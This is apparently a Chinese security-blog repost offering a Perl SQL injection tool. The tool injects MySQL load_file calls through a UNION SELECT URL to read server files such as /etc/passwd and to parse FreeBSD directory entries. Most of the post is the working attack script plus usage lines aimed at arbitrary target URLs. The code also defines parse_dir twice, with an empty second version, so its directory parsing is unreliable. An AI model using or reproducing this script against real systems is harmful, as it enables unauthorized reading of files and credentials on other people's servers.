SQL注射中使用Mysql load_file解析bsd目录的脚本
- 发表于
- Vulndb
作者:xi4oyu
可能不少x客都知道mysql load_file能够读取文件的内容。但是在bsd平台上,load_file也能够以文件的方式读取目录内容的前512个字节。
以前遇到这种站都是泛着恶心的手工load,然后在一堆可打印字符中查找目录名称。
后来实在抗不住了,得,我还是写个“友爱”的程序来自动解析吧,这样也避免了某些情况下目录被看漏掉。
今天偶尔从硬盘里面翻到的,放出来大家用用吧,有问题反馈下。Thx
xi4oyu@3xpl4b:~$ perl dump_bsd_dir.pl
dump_bsd_dir : List freebsd DIRS USE load_file with MYSQL
By xi4oyu evil.xi4oyu#gmail.com
http://www.pentestday.com
usage: dump_bsd_dir.pl [options]
-u : Inject url
-d|-f : DIR/FILE to list
Ext: dump_bsd_dir.pl -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,FUCKBSD,3 -d /etc
dump_bsd_dir.pl -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,FUCKBSD,3 -f /etc/passwd
#!/usr/bin/perl
use LWP::UserAgent;
use strict;
use Getopt::Std;
use vars qw / %opt /;
use constant True => 1;
my $rep_word = "FUCKBSD";
my $sep_flag = "%!!";
my $user_agent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;.NET CLR 1.1.4122)";
my $target = '';
my $target_rep = '';
my $dir = '';
my $file = '';
sub usage{
print STDERR <<"EOF";
dump_bsd_dir : List freebsd DIRS USE load_file with MYSQL
By xi4oyu evil.xi4oyu#gmail.com
http://www.pentestday.com
usage: $0 [options]
-u : Inject url
-d|-f : DIR/FILE to list
Ext: $0 -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,FUCKBSD,3 -d /etc
$0 -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,FUCKBSD,3 -f /etc/passwd
EOF
exit;
}
sub hex_str{
my $hex_str = shift;
my $hexed_str = "0x";
$hexed_str .= unpack("H*",$hex_str);
return $hexed_str;
}
#This function parsed freebsd dirent struct and print out result
=pod
src/sys/sys/dirent.h
Ref:http://fxr.watson.org/fxr/source/sys/dirent.h?v=FREEBSD7
49
50 struct dirent {
51 __uint32_t d_fileno;/* file number of entry */
52 __uint16_t d_reclen;/* length of this record */
53 __uint8_td_type;/* file type, see below */
54 __uint8_td_namlen;/* length of string in d_name */
55 #if __BSD_VISIBLE
56 #define MAXNAMLEN 255
57 chard_name[MAXNAMLEN + 1];/* name must be no longer than this */
58 #else
59 chard_name[255 + 1];/* name must be no longer than this */
60 #endif
61 };
62
63 #if __BSD_VISIBLE
64 /*
65* File types
66*/
67 #define DT_UNKNOWN 0
68 #define DT_FIFO1
69 #define DT_CHR 2
70 #define DT_DIR 4
71 #define DT_BLK 6
72 #define DT_REG 8
73 #define DT_LNK10
74 #define DT_SOCK 12
75 #define DT_WHT14
=cut
sub parse_dir{
my $dirent_hex = shift;
#skip 48
my $dir = substr($dirent_hex,48);
my $ent_len = 9;
my $index = 0;
while( True ){
my $header = substr($dir,$index,16);
my ($inode,$ent_len,$ent_type,$name_len) = unpack("LSCC",pack("H*",$header));
last if $ent_len == 0;
my $name = substr($dir,$index+16,$name_len * 2);
my $str_name = unpack("a*",pack("H*",$name));
my $type = "file:";
if($ent_type == 4){
$type = "dir:";
$str_name .= "/";
}elsif($ent_type == 10){
$type = "link:";
}elsif($ent_type == 1){
$type = "fifo:";
}elsif($ent_type == 12){
$type = "socket:";
}elsif($ent_type == 6){
$type = "blk:";
}
print "$type\t$str_name\n";
$index += 2* $ent_len;
}
}
sub get_that_shit{
my $hexed_str = shift;
my $url = $target;
$url =~ s/$rep_word/$hexed_str/g;
#print $url;
my $ua = LWP::UserAgent->new;
$ua->agent("$user_agent");
my $req = HTTP::Request->new(GET => "$url");
my $rest = $ua->request($req);
my $content = $rest->content;
#print $content;
my $ret = "ERROR";
#print $sep_flag;
if( $content =~ /$sep_flag(.*)$sep_flag/sg){
$ret = $1;
}
return $ret;
}
sub parse_dir{
my $hex_code = shift;
}
#================================================================#
#Here We Go!
my $opt_string = "u:d:f:";
usage if $#ARGV < 0;
getopts("$opt_string",\%opt) or usage();
usage if $opt{h};
$target = $opt{u} if $opt{u};
$dir = $opt{d} if $opt{d};
$file = $opt{f} if $opt{f};
if(!$target || (!$dir && !$file)){
usage();
}
my $hexed_str = "";
my $sep_flag_hex = hex_str($sep_flag);
if($dir){
$hexed_str = "hex(concat($sep_flag_hex,load_file(".hex_str($dir)."),$sep_flag_hex))";
}else{
$hexed_str = "concat($sep_flag_hex,load_file(".hex_str($file)."),$sep_flag_hex)";
}
#print $hexed_str."\n";
my $ret_str = get_that_shit($hexed_str);
if($file){
print $ret_str;
}else{
parse_dir($ret_str);
}
原文连接:SQL注射中使用Mysql load_file解析bsd目录的脚本
所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
